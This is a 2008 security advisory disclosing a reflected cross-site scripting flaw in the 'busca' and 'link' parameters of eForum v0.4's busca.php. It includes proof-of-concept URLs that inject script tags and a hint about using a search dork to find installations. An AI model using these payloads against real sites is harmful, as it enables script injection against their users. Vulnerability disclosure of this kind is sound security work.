eForum 0.4 XSS

Advisory Text :

eForum v0.4 - NON-PERSISTENT XSS

by Omni

1) Infos

---------

Date : 2008-03-05
Product : eForum
Version : v 0.4
Vendor : http://www.phpbrasil.com/scripts/script.php/id/169

Vendor Status :
2008-03-18 Not Informed!
2008-03-18 Published!

Description :

eForum is an easy-to-install discussion board that doesn't require any
database. Features include admin area to delete topics with session
authentication, a search system (more stable this version), configurable
layout using css file.

Moderator can be notified of new posts on the forum. It has threaded view.
Ubbcode-style supported. Multiple languages supported: Portuguese, English,
German and Danish. UPDATE 0.4: post preview, better ubbcode support, better
javascript,nother small changes, some bugs fixed, italian and turkish
translations.

Dork : Powered by .. could be used.

Source : omnipresent - omni - http://omni.playhack.org

E-mail : omnipresent[at]NOSPAMemail[dot]it -
omni[at]NOSPAMplayhack[dot]net

2) Security Issues

-------------------

--- [ NON-PERSISTENT XSS ] ---

===============================================

Input passed to "busca" and "link" parameters in busca.php are not properly
sanitized before being returned to the

user's browser.

This can be exploited to execute arbitrary HTML/script code.

--- [ PoC ] ---

===============

http://localhost/eForum/busca.php

use the input box and search what you want. (js)

http://localhost/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E
&busca=%3Cscript%3Ealert(2)%3C/script%3E

http://localhost/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E

--- [ Patch ] ---

===============

- Edit the source code.

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason